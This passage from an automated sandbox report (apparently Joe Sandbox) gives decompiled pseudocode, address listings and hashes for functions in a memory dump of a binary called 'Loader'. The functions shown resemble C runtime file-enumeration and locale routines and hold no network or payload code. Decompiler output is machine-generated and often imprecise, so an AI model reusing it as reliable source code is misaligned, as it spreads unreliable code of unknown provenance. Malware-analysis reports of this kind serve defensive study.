								_t167 = 0;
								_t14 = _t130 + 4;
								 *_t14 =  *(_t130 + 4) + 4;
								__eflags =  *_t14;
							} else {
								E00AF4AEF(_t165);
								_t167 = _v8;
							}
							E00AF4AEF(0);
							_t121 = _t167;
							goto L4;
						}
					} else {
						_push(_t158);
						_t123 = E00B016DE(_t165, _t126, _a8);
						_t172 = _t171 + 0x10;
						__eflags = _t123;
						if(_t123 != 0) {
							L12:
							_push(0);
							_push(0);
							_push(0);
							_push(0);
							_push(0);
							E00AED26C();
							asm("int3");
							_t170 = _t172;
							_t173 = _t172 - 0x298;
							_t75 =  *0xb36bac; // 0x85d5fe2b
							_v48 = _t75 ^ _t170;
							_t138 = _v32;
							_t156 = _v28;
							_push(_t126);
							_push(0);
							_t160 = _v36;
							_v648 = _t156;
							__eflags = _t138 - _t160;
							if(_t138 != _t160) {
								while(1) {
									_t116 =  *_t138;
									__eflags = _t116 - 0x2f;
									if(_t116 == 0x2f) {
										break;
									}
									__eflags = _t116 - 0x5c;
									if(_t116 != 0x5c) {
										__eflags = _t116 - 0x3a;
										if(_t116 != 0x3a) {
											_t138 = E00B025F0(_t160, _t138);
											__eflags = _t138 - _t160;
											if(_t138 != _t160) {
												continue;
											}
										}
									}
									break;
								}
								_t156 = _v612;
							}
							_t77 =  *_t138;
							_v605 = _t77;
							__eflags = _t77 - 0x3a;
							if(_t77 != 0x3a) {
								L23:
								_t127 = 0;
								__eflags = _t77 - 0x2f;
								if(__eflags == 0) {
									L26:
									_t78 = 1;
								} else {
									__eflags = _t77 - 0x5c;
									if(__eflags == 0) {
										goto L26;
									} else {
										__eflags = _t77 - 0x3a;
										_t78 = 0;
										if(__eflags == 0) {
											goto L26;
										}
									}
								}
								_v672 = _t127;
								_v668 = _t127;
								_push(_t165);
								asm("sbb eax, eax");
								_v664 = _t127;
								_v660 = _t127;
								_v640 =  ~(_t78 & 0x000000ff) & _t138 - _t160 + 0x00000001;
								_v656 = _t127;
								_v652 = _t127;
								_t84 = E00AF0F6B(_t138 - _t160 + 1, _t160,  &_v672, E00AFB96A(_t156, __eflags));
								_t174 = _t173 + 0xc;
								asm("sbb eax, eax");
								_t166 = FindFirstFileExW( !( ~_t84) & _v664, _t127,  &_v604, _t127, _t127, _t127);
								__eflags = _t166 - 0xffffffff;
								if(_t166 != 0xffffffff) {
									_t143 =  *((intOrPtr*)(_v612 + 4)) -  *_v612;
									__eflags = _t143;
									_t144 = _t143 >> 2;
									_v644 = _t143 >> 2;
									do {
										_v636 = _t127;
										_v632 = _t127;
										_v628 = _t127;
										_v624 = _t127;
										_v620 = _t127;
										_v616 = _t127;
										_t94 = E00AFBB46( &(_v604.cFileName),  &_v636,  &_v605, E00AFB96A(_t156, __eflags));
										_t174 = _t174 + 0x10;
										asm("sbb eax, eax");
										_t97 =  !( ~_t94) & _v628;
										__eflags =  *_t97 - 0x2e;
										if( *_t97 != 0x2e) {
											L34:
											_push(_v612);
											_t98 = E00AFBE04(_t144, _t166, _t97, _t160, _v640);
											_t174 = _t174 + 0x10;
											_v648 = _t98;
											__eflags = _t98;
											if(_t98 != 0) {
												__eflags = _v616 - _t127;
												if(_v616 != _t127) {
													E00AF4AEF(_v628);
													_t98 = _v648;
												}
												_t127 = _t98;
											} else {
												goto L35;
											}
										} else {
											_t144 =  *((intOrPtr*)(_t97 + 1));
											__eflags = _t144;
											if(_t144 == 0) {
												goto L35;
											} else {
												__eflags = _t144 - 0x2e;
												if(_t144 != 0x2e) {
													goto L34;
												} else {
													__eflags =  *((intOrPtr*)(_t97 + 2)) - _t127;
													if( *((intOrPtr*)(_t97 + 2)) == _t127) {
														goto L35;
													} else {
														goto L34;
													}
												}
											}
										}
										L43:
										FindClose(_t166);
										goto L44;
										L35:
										__eflags = _v616 - _t127;
										if(_v616 != _t127) {
											E00AF4AEF(_v628);
											_pop(_t144);
										}
										__eflags = FindNextFileW(_t166,  &_v604);
									} while (__eflags != 0);
									_t106 = _v612;
									_t149 = _v644;
									_t156 =  *_t106;
									_t109 =  *((intOrPtr*)(_t106 + 4)) -  *_t106 >> 2;
									__eflags = _t149 - _t109;
									if(_t149 != _t109) {
										E00B020C0(_t156, _t156 + _t149 * 4, _t109 - _t149, 4, E00AFBB2E);
									}
									goto L43;
								} else {
									_push(_v612);
									_t127 = E00AFBE04( &_v604, _t166, _t160, _t127, _t127);
								}
								L44:
								__eflags = _v652;
								_pop(_t165);
								if(_v652 != 0) {
									E00AF4AEF(_v664);
								}
								_t100 = _t127;
							} else {
								__eflags = _t138 - _t160 + 1;
								if(_t138 == _t160 + 1) {
									_t77 = _v605;
									goto L23;
								} else {
									_push(_t156);
									_t100 = E00AFBE04(_t138, _t165, _t160, 0, 0);
								}
							}
							_pop(_t161);
							__eflags = _v12 ^ _t170;
							_pop(_t128);
							return E00AE95ED(_t100, _t128, _v12 ^ _t170, _t156, _t161, _t165);
						} else {
							goto L7;
						}
					}
				} else {
					_t121 = 0xc;
					L4:
					return _t121;
				}
			}

0x00afbe09
0x00afbe0a
0x00afbe0d
0x00afbe0d
0x00afbe10
0x00afbe10
0x00afbe12
0x00afbe13
0x00afbe18
0x00afbe1f
0x00afbe22
0x00afbe27
0x00afbe30
0x00afbe31
0x00afbe34
0x00afbe3e
0x00afbe42
0x00afbe44
0x00afbe58
0x00afbe58
0x00afbe5b
0x00afbe65
0x00afbe6a
0x00afbe6d
0x00afbe6f
0x00000000
0x00afbe71
0x00afbe71
0x00afbe76
0x00afbe7d
0x00afbe80
0x00afbe82
0x00afbe93
0x00afbe95
0x00afbe97
0x00afbe97
0x00afbe97
0x00afbe84
0x00afbe85
0x00afbe8a
0x00afbe8d
0x00afbe9c
0x00afbea2
0x00000000
0x00afbea5
0x00afbe46
0x00afbe46
0x00afbe4c
0x00afbe51
0x00afbe54
0x00afbe56
0x00afbea8
0x00afbeaa
0x00afbeab
0x00afbeac
0x00afbead
0x00afbeae
0x00afbeaf
0x00afbeb4
0x00afbeb8
0x00afbeba
0x00afbec0
0x00afbec7
0x00afbeca
0x00afbecd
0x00afbed0
0x00afbed1
0x00afbed2
0x00afbed5
0x00afbedb
0x00afbedd
0x00afbedf
0x00afbedf
0x00afbee1
0x00afbee3
0x00000000
0x00000000
0x00afbee5
0x00afbee7
0x00afbee9
0x00afbeeb
0x00afbef6
0x00afbef8
0x00afbefa
0x00000000
0x00000000
0x00afbefa
0x00afbeeb
0x00000000
0x00afbee7
0x00afbefc
0x00afbefc
0x00afbf02
0x00afbf04
0x00afbf0a
0x00afbf0c
0x00afbf2e
0x00afbf2e
0x00afbf30
0x00afbf32
0x00afbf3e
0x00afbf3e
0x00afbf34
0x00afbf34
0x00afbf36
0x00000000
0x00afbf38
0x00afbf38
0x00afbf3a
0x00afbf3c
0x00000000
0x00000000
0x00afbf3c
0x00afbf36
0x00afbf46
0x00afbf4e
0x00afbf54
0x00afbf55
0x00afbf57
0x00afbf5f
0x00afbf65
0x00afbf6b
0x00afbf71
0x00afbf85
0x00afbf8a
0x00afbf95
0x00afbfab
0x00afbfad
0x00afbfb0
0x00afbfd3
0x00afbfd3
0x00afbfd5
0x00afbfd8
0x00afbfde
0x00afbfde
0x00afbfe4
0x00afbfea
0x00afbff0
0x00afbff6
0x00afbffc
0x00afc01d
0x00afc022
0x00afc027
0x00afc02b
0x00afc031
0x00afc034
0x00afc047
0x00afc047
0x00afc055
0x00afc05a
0x00afc05d
0x00afc063
0x00afc065
0x00afc0c3
0x00afc0c9
0x00afc0d1
0x00afc0d6
0x00afc0dc
0x00afc0dd
0x00000000
0x00000000
0x00000000
0x00afc036
0x00afc036
0x00afc039
0x00afc03b
0x00000000
0x00afc03d
0x00afc03d
0x00afc040
0x00000000
0x00afc042
0x00afc042
0x00afc045
0x00000000
0x00000000
0x00000000
0x00000000
0x00afc045
0x00afc040
0x00afc03b
0x00afc0df
0x00afc0e0
0x00000000
0x00afc067
0x00afc067
0x00afc06d
0x00afc075
0x00afc07a
0x00afc07a
0x00afc089
0x00afc089
0x00afc091
0x00afc097
0x00afc09d
0x00afc0a4
0x00afc0a7
0x00afc0a9
0x00afc0b9
0x00afc0be
0x00000000
0x00afbfb2
0x00afbfb2
0x00afbfc3
0x00afbfc3
0x00afc0e6
0x00afc0e6
0x00afc0ed
0x00afc0ee
0x00afc0f6
0x00afc0fb
0x00afc0fc
0x00afbf0e
0x00afbf11
0x00afbf13
0x00afbf28
0x00000000
0x00afbf15
0x00afbf15
0x00afbf1b
0x00afbf20
0x00afbf13
0x00afc101
0x00afc102
0x00afc104
0x00afc10b
0x00000000
0x00000000
0x00000000
0x00afbe56
0x00afbe29
0x00afbe2b
0x00afbe2c
0x00afbe2e
0x00afbe2e

Memory Dump Source

Source File: 00000000.00000002.283555540.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true

Associated: 00000000.00000002.283512556.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.285047388.0000000000B05000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.285850162.0000000000B14000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.285864405.0000000000B15000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.287188841.0000000000B39000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ae0000_Loader.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6b66aad34c93f7e10ba415d7161e8d48af6f4aec4492a0aeeb66816f1a00fa56
Instruction ID: 1c29f7daa53ddd3412ab9dd24c8191abca51cbda4705cda45c93bc9184ad4413
Opcode Fuzzy Hash: 6b66aad34c93f7e10ba415d7161e8d48af6f4aec4492a0aeeb66816f1a00fa56
Instruction Fuzzy Hash: 674193B180421CAEDB20DFA9CC89AFABBB9AF45300F1442D9F55DD3211DB359E848F20

Uniqueness

Uniqueness Score: -1.00%

Function 00AFEFE3 Relevance: 1.6, APIs: 1, Instructions: 83
COMMON

Download Yara Rule

C-Code - Quality: 68%

			E00AFEFE3(void* __ecx, void* __edx, void* __eflags, intOrPtr _a4) {
				signed int _v8;
				short _v248;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t15;
				signed int _t21;
				signed int _t23;
				signed int _t30;
				signed int _t31;
				void* _t32;
				signed int _t41;
				signed int* _t47;
				int _t49;
				signed int _t50;

				_t46 = __edx;
				_t15 =  *0xb36bac; // 0x85d5fe2b
				_v8 = _t15 ^ _t50;
				_t32 = E00AF4840(__ecx, __edx);
				_t47 =  *(E00AF4840(__ecx, __edx) + 0x34c);
				_t49 = E00AFF0B8(_a4);
				asm("sbb ecx, ecx");
				_t21 = GetLocaleInfoW(_t49, ( ~( *(_t32 + 0x60)) & 0xfffff002) + 0x1001,  &_v248, 0x78);
				if(_t21 != 0) {
					_t23 = E00AFB834(_t47, _t49,  *((intOrPtr*)(_t32 + 0x50)),  &_v248);
					_t41 =  *(_t32 + 0x60);
					__eflags = _t23;
					if(_t23 != 0) {
						__eflags = _t41;
						if(_t41 == 0) {
							__eflags =  *((intOrPtr*)(_t32 + 0x5c)) - _t41;
							if( *((intOrPtr*)(_t32 + 0x5c)) != _t41) {
								_t30 = E00AFB834(_t47, _t49,  *((intOrPtr*)(_t32 + 0x50)),  &_v248);
								__eflags = _t30;
								if(__eflags == 0) {
									_push(_t47);
									_push(_t30);
									goto L9;
								}
							}
						}
					} else {
						__eflags = _t41;
						if(__eflags != 0) {
							L10:
							 *_t47 =  *_t47 | 0x00000004;
							__eflags =  *_t47;
							_t47[1] = _t49;
							_t47[2] = _t49;
						} else {
							_push(_t47);
							_push(1);
							L9:
							_push(_t49);
							_t31 = E00AFF20F(__eflags);
							__eflags = _t31;
							if(_t31 != 0) {
								goto L10;
							}
						}
					}
					_t27 =  !( *_t47 >> 2) & 0x00000001;
					__eflags =  !( *_t47 >> 2) & 0x00000001;
				} else {
					 *_t47 =  *_t47 & _t21;
					_t27 = _t21 + 1;
				}
				return E00AE95ED(_t27, _t32, _v8 ^ _t50, _t46, _t47, _t49);
			}

0x00afefe3
0x00afefee
0x00afeff5
0x00aff003
0x00aff00b
0x00aff01a
0x00aff026
0x00aff037
0x00aff03f
0x00aff050
0x00aff057
0x00aff05a
0x00aff05c
0x00aff067
0x00aff069
0x00aff06b
0x00aff06e
0x00aff07a
0x00aff081
0x00aff083
0x00aff085
0x00aff086
0x00000000
0x00aff086
0x00aff083
0x00aff06e
0x00aff05e
0x00aff05e
0x00aff060
0x00aff094
0x00aff094
0x00aff094
0x00aff097
0x00aff09a
0x00aff062
0x00aff062
0x00aff063
0x00aff087
0x00aff087
0x00aff088
0x00aff090
0x00aff092
0x00000000
0x00000000
0x00aff092
0x00aff060
0x00aff0a4
0x00aff0a4
0x00aff041
0x00aff041
0x00aff043
0x00aff043
0x00aff0b5

APIs

Part of subcall function 00AF4840: GetLastError.KERNEL32(?,00000000,?,00AED8CE,00000000,00000000,?,?,00AF6FF2,00000000,00000000,?,00000000,?), ref: 00AF4845
Part of subcall function 00AF4840: SetLastError.KERNEL32(00000000,00000005,000000FF,?,00AF6FF2,00000000,00000000,?,00000000,?), ref: 00AF48E3

Part of subcall function 00AF4840: _free.LIBCMT ref: 00AF48A2
Part of subcall function 00AF4840: _free.LIBCMT ref: 00AF48D8

GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00AFF037

Memory Dump Source

Source File: 00000000.00000002.283555540.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true

Associated: 00000000.00000002.283512556.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.285047388.0000000000B05000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.285850162.0000000000B14000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.285864405.0000000000B15000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.287188841.0000000000B39000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ae0000_Loader.jbxd

Yara matches

Similarity

API ID: ErrorLast_free$InfoLocale
String ID:
API String ID: 2003897158-0
Opcode ID: d56e85b4039778909627a55a73a83cf4dd245bd3e8369ccd706450e4b39dea50
Instruction ID: cb339f169a988e1083bbe2e1e363070b9dd395b0f4d79731b58a3d53b933d803
Opcode Fuzzy Hash: d56e85b4039778909627a55a73a83cf4dd245bd3e8369ccd706450e4b39dea50
Instruction Fuzzy Hash: 4D21807265120AAFDB289BA5DD42ABB77A8EF45310F14407AFA01C7242FF34ED04CA50

Uniqueness

Uniqueness Score: -1.00%

Function 00AFEC6A Relevance: 1.6, APIs: 1, Instructions: 63
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 91%

			E00AFEC6A(void* __ecx, void* __edx, void* __eflags, signed int* _a4) {
				void* __ebp;
				intOrPtr _t26;
				intOrPtr _t29;
				signed int _t32;
				signed char _t33;
				signed char _t34;
				intOrPtr* _t38;
				intOrPtr* _t41;
				signed int _t47;
				void* _t50;
				void* _t51;
				signed int* _t52;
				void* _t53;
				signed int _t62;

				_t53 = E00AF4840(__ecx, __edx);
				_t47 = 2;
				_t38 =  *((intOrPtr*)(_t53 + 0x50));
				_t50 = _t38 + 2;
				do {
					_t26 =  *_t38;
					_t38 = _t38 + _t47;
				} while (_t26 != 0);
				_t41 =  *((intOrPtr*)(_t53 + 0x54));
				 *(_t53 + 0x60) = 0 | _t38 - _t50 >> 0x00000001 == 0x00000003;
				_t51 = _t41 + 2;
				do {
					_t29 =  *_t41;
					_t41 = _t41 + _t47;
				} while (_t29 != 0);
				_t52 = _a4;
				 *(_t53 + 0x64) = 0 | _t41 - _t51 >> 0x00000001 == 0x00000003;
				_t52[1] = 0;
				if( *(_t53 + 0x60) == 0) {
					_t47 = E00AFED64( *((intOrPtr*)(_t53 + 0x50)));
				}
				 *(_t53 + 0x5c) = _t47;
				_t32 = EnumSystemLocalesW(E00AFED90, 1);
				_t62 =  *_t52 & 0x00000007;
				asm("bt ecx, 0x9");
				_t33 = _t32 & 0xffffff00 | _t62 > 0x00000000;
				asm("bt ecx, 0x8");
				_t34 = _t33 & 0xffffff00 | _t62 > 0x00000000;
				if((_t34 & (_t47 & 0xffffff00 | _t62 != 0x00000000) & _t33) == 0) {
					 *_t52 = 0;
					return _t34;
				}
				return _t34;
			}

0x00afec77
0x00afec7d
0x00afec7e
0x00afec81
0x00afec84
0x00afec84
0x00afec87
0x00afec89
0x00afec97
0x00afec9d
0x00afeca0
0x00afeca3
0x00afeca3
0x00afeca6
0x00afeca8
0x00afecb1
0x00afecbc
0x00afecbf
0x00afecc5
0x00afecd0
0x00afecd0
0x00afecd9
0x00afecdc
0x00afece4
0x00afecea
0x00afecee
0x00afecf3
0x00afecf7
0x00afecfc
0x00afecfe
0x00000000
0x00afecfe
0x00afed04

APIs

Part of subcall function 00AF4840: GetLastError.KERNEL32(?,00000000,?,00AED8CE,00000000,00000000,?,?,00AF6FF2,00000000,00000000,?,00000000,?), ref: 00AF4845
Part of subcall function 00AF4840: SetLastError.KERNEL32(00000000,00000005,000000FF,?,00AF6FF2,00000000,00000000,?,00000000,?), ref: 00AF48E3

EnumSystemLocalesW.KERNEL32(00AFED90,00000001,00000000,?,-00000050,?,00AFF3BE,00000000,?,?,?,00000055,?), ref: 00AFECDC

Memory Dump Source

Source File: 00000000.00000002.283555540.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true

Associated: 00000000.00000002.283512556.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.285047388.0000000000B05000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.285850162.0000000000B14000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.285864405.0000000000B15000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.287188841.0000000000B39000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ae0000_Loader.jbxd

Yara matches

Similarity

API ID: ErrorLast$EnumLocalesSystem
String ID:
API String ID: 2417226690-0
Opcode ID: 1acf50e93ab6585adf5ba85aab41af65c23f2bda053331806d31ba2348b1463b
Instruction ID: dbc8174432563dd06cfa2f2e270bfa34a3be9cbc948cbdc3750961405890fff5
Opcode Fuzzy Hash: 1acf50e93ab6585adf5ba85aab41af65c23f2bda053331806d31ba2348b1463b
Instruction Fuzzy Hash: ED11C6362007055FDB28DF79D89157ABB92FF84758B18882DF64687A50D771A942CB80

Uniqueness

Uniqueness Score: -1.00%

Function 00AFF20F Relevance: 1.5, APIs: 1, Instructions: 45
COMMON

Download Yara Rule

C-Code - Quality: 93%

			E00AFF20F(void* __eflags, signed int _a4, intOrPtr _a8) {
				short _v8;
				void* __ecx;
				void* __ebp;
				void* _t8;
				void* _t11;
				intOrPtr _t13;
				void* _t15;
				void* _t19;
				void* _t21;
				void* _t23;
				signed int _t26;
				intOrPtr* _t28;

				_push(_t15);
				_t8 = E00AF4840(_t15, _t21);
				_t26 = _a4;
				_t23 = _t8;
				if(GetLocaleInfoW(_t26 & 0x000003ff | 0x00000400, 0x20000001,  &_v8, 2) == 0) {
					L7:
					_t11 = 0;
				} else {
					if(_t26 == _v8 || _a8 == 0) {
						L6:
						_t11 = 1;
					} else {
						_t28 =  *((intOrPtr*)(_t23 + 0x50));
						_t19 = _t28 + 2;
						do {
							_t13 =  *_t28;
							_t28 = _t28 + 2;
						} while (_t13 != 0);
						if(E00AFED64( *((intOrPtr*)(_t23 + 0x50))) == _t28 - _t19 >> 1) {
							goto L7;
						} else {
							goto L6;
						}
					}
				}
				return _t11;
			}

0x00aff214
0x00aff217
0x00aff21c
0x00aff21f
0x00aff243
0x00aff277
0x00aff277
0x00aff245
0x00aff248
0x00aff272
0x00aff274
0x00aff250
0x00aff250
0x00aff253
0x00aff256
0x00aff256
0x00aff259
0x00aff25c
0x00aff270
0x00000000
0x00000000
0x00000000
0x00000000
0x00aff270
0x00aff248
0x00aff27c

APIs

Part of subcall function 00AF4840: GetLastError.KERNEL32(?,00000000,?,00AED8CE,00000000,00000000,?,?,00AF6FF2,00000000,00000000,?,00000000,?), ref: 00AF4845
Part of subcall function 00AF4840: SetLastError.KERNEL32(00000000,00000005,000000FF,?,00AF6FF2,00000000,00000000,?,00000000,?), ref: 00AF48E3

GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,00AFEFAC,00000000,00000000,?), ref: 00AFF23B

Memory Dump Source

Source File: 00000000.00000002.283555540.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true

Associated: 00000000.00000002.283512556.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.285047388.0000000000B05000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.285850162.0000000000B14000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.285864405.0000000000B15000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.287188841.0000000000B39000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ae0000_Loader.jbxd

Yara matches

Similarity

API ID: ErrorLast$InfoLocale
String ID:
API String ID: 3736152602-0
Opcode ID: 3d6d460870f6c0d287082c1cb975878b348e444de4124658df429403d7be0cda
Instruction ID: 10ec042f3ee4beba805dbd877e7f015d0a3e6e8e145ab6f5bd5a109db7acd9a4
Opcode Fuzzy Hash: 3d6d460870f6c0d287082c1cb975878b348e444de4124658df429403d7be0cda
Instruction Fuzzy Hash: 46F0D677900119AFDF245BA088056FB7764EF40794F144434FE01A3180EB70ED41C990

Uniqueness

Uniqueness Score: -1.00%

Function 00AFED05 Relevance: 1.5, APIs: 1, Instructions: 41
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 100%

			E00AFED05(void* __ecx, void* __edx, void* __eflags, signed char* _a4) {
				void* __ebp;
				intOrPtr _t11;
				signed char* _t15;
				intOrPtr* _t19;
				intOrPtr _t24;
				void* _t25;
				void* _t26;

				_t26 = E00AF4840(__ecx, __edx);
				_t24 = 2;
				_t19 =  *((intOrPtr*)(_t26 + 0x50));
				_t25 = _t19 + 2;
				do {
					_t11 =  *_t19;
					_t19 = _t19 + _t24;
				} while (_t11 != 0);
				_t4 = _t19 - _t25 >> 1 == 3;
				 *(_t26 + 0x60) = 0 | _t4;
				if(_t4 != 0) {
					_t24 = E00AFED64( *((intOrPtr*)(_t26 + 0x50)));
				}
				 *((intOrPtr*)(_t26 + 0x5c)) = _t24;
				EnumSystemLocalesW(E00AFEFE3, 1);
				_t15 = _a4;
				if(( *_t15 & 0x00000004) == 0) {
					 *_t15 = 0;
					return _t15;
				}
				return _t15;
			}

0x00afed12
0x00afed18
0x00afed19
0x00afed1c
0x00afed1f
0x00afed1f
0x00afed22
0x00afed24
0x00afed32
0x00afed35
0x00afed38
0x00afed43
0x00afed43
0x00afed4c
0x00afed4f
0x00afed55
0x00afed5b
0x00afed5d
0x00000000
0x00afed5d
0x00afed63

APIs

Part of subcall function 00AF4840: GetLastError.KERNEL32(?,00000000,?,00AED8CE,00000000,00000000,?,?,00AF6FF2,00000000,00000000,?,00000000,?), ref: 00AF4845
Part of subcall function 00AF4840: SetLastError.KERNEL32(00000000,00000005,000000FF,?,00AF6FF2,00000000,00000000,?,00000000,?), ref: 00AF48E3

EnumSystemLocalesW.KERNEL32(00AFEFE3,00000001,?,?,-00000050,?,00AFF382,-00000050,?,?,?,00000055,?,-00000050,?,?), ref: 00AFED4F

Memory Dump Source

Source File: 00000000.00000002.283555540.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true

Associated: 00000000.00000002.283512556.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.285047388.0000000000B05000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.285850162.0000000000B14000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.285864405.0000000000B15000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.287188841.0000000000B39000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ae0000_Loader.jbxd

Yara matches

Similarity

API ID: ErrorLast$EnumLocalesSystem
String ID:
API String ID: 2417226690-0
Opcode ID: bab62e9634abf6e43307b1d768779075bd1fc10cf050a2186cef8f791c9fe34e
Instruction ID: 0c1c825983e203cf3fd34c1628ca367cc4b2371a0b11bd92b356153cb8a2433e
Opcode Fuzzy Hash: bab62e9634abf6e43307b1d768779075bd1fc10cf050a2186cef8f791c9fe34e
Instruction Fuzzy Hash: F1F0F6362003085FDB249FB9D885A7B7B91FF80768B19842DFB064BAA0D6B1AC41CB50

Uniqueness

Uniqueness Score: -1.00%

Function 00AF6687 Relevance: 1.5, APIs: 1, Instructions: 33
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 83%

			E00AF6687(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t17;
				signed int _t29;
				void* _t31;

				_push(0xc);
				_push(0xb12eb0);
				E00AE9A40(__ebx, __edi, __esi);
				 *(_t31 - 0x1c) =  *(_t31 - 0x1c) & 0x00000000;
				E00AEE821( *((intOrPtr*)( *((intOrPtr*)(_t31 + 8)))));
				 *(_t31 - 4) =  *(_t31 - 4) & 0x00000000;
				 *0xb38810 = E00AF1512( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t31 + 0xc)))))));
				_t29 = EnumSystemLocalesW(E00AF667A, 1);
				_t17 =  *0xb36bac; // 0x85d5fe2b
				 *0xb38810 = _t17;
				 *(_t31 - 0x1c) = _t29;
				 *(_t31 - 4) = 0xfffffffe;
				E00AF66F7();
				 *[fs:0x0] =  *((intOrPtr*)(_t31 - 0x10));
				return _t29;
			}

0x00af6687
0x00af6689
0x00af668e
0x00af6693
0x00af669c
0x00af66a2
0x00af66b3
0x00af66c5
0x00af66c7
0x00af66cc
0x00af66d1
0x00af66d4
0x00af66db
0x00af66e5
0x00af66f1

APIs

Part of subcall function 00AEE821: EnterCriticalSection.KERNEL32(-00B38247,?,00AF1360,00000000,00B12CD0,0000000C,00AF1327,?,?,00AF4AC5,?,?,00AF49E2,00000001,00000364,00000005), ref: 00AEE830

EnumSystemLocalesW.KERNEL32(00AF667A,00000001,00B12EB0,0000000C,00AF6AA5,00000000), ref: 00AF66BF

Memory Dump Source

Source File: 00000000.00000002.283555540.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true

Associated: 00000000.00000002.283512556.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.285047388.0000000000B05000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.285850162.0000000000B14000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.285864405.0000000000B15000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.287188841.0000000000B39000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ae0000_Loader.jbxd

Yara matches

Similarity

API ID: CriticalEnterEnumLocalesSectionSystem
String ID:
API String ID: 1272433827-0
Opcode ID: 60b60e707113d50cacedbdf4774af7989773a4041aa8b57fa811b5940ce83467
Instruction ID: c58ee6fa94db21cc95c27b78973ab26c2694073858f2c0e1b7b5669188045ac7
Opcode Fuzzy Hash: 60b60e707113d50cacedbdf4774af7989773a4041aa8b57fa811b5940ce83467
Instruction Fuzzy Hash: D9F03776A00214EFD700EF98E942BAD7BF0FB08720F20852AF512DB2A0DBB559408F81

Uniqueness

Uniqueness Score: -1.00%

Function 00AFEC1F Relevance: 1.5, APIs: 1, Instructions: 31
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 100%

			E00AFEC1F(void* __ecx, void* __edx, void* __eflags, signed char* _a4) {
				void* __ebp;
				intOrPtr _t9;
				signed char* _t13;
				intOrPtr* _t15;
				void* _t19;
				void* _t21;

				_t19 = E00AF4840(__ecx, __edx);
				_t15 =  *((intOrPtr*)(_t19 + 0x54));
				_t21 = _t15 + 2;
				do {
					_t9 =  *_t15;
					_t15 = _t15 + 2;
				} while (_t9 != 0);
				 *(_t19 + 0x64) = 0 | _t15 - _t21 >> 0x00000001 == 0x00000003;
				EnumSystemLocalesW(0xafeb78, 1);
				_t13 = _a4;
				if(( *_t13 & 0x00000004) == 0) {
					 *_t13 = 0;
					return _t13;
				}
				return _t13;
			}

0x00afec2b
0x00afec2f
0x00afec32
0x00afec35
0x00afec35
0x00afec38
0x00afec3b
0x00afec53
0x00afec56
0x00afec5c
0x00afec62
0x00afec64
0x00000000
0x00afec64
0x00afec69

APIs

Part of subcall function 00AF4840: GetLastError.KERNEL32(?,00000000,?,00AED8CE,00000000,00000000,?,?,00AF6FF2,00000000,00000000,?,00000000,?), ref: 00AF4845
Part of subcall function 00AF4840: SetLastError.KERNEL32(00000000,00000005,000000FF,?,00AF6FF2,00000000,00000000,?,00000000,?), ref: 00AF48E3

EnumSystemLocalesW.KERNEL32(00AFEB78,00000001,?,?,?,00AFF3E0,-00000050,?,?,?,00000055,?,-00000050,?,?,00000004), ref: 00AFEC56

Memory Dump Source

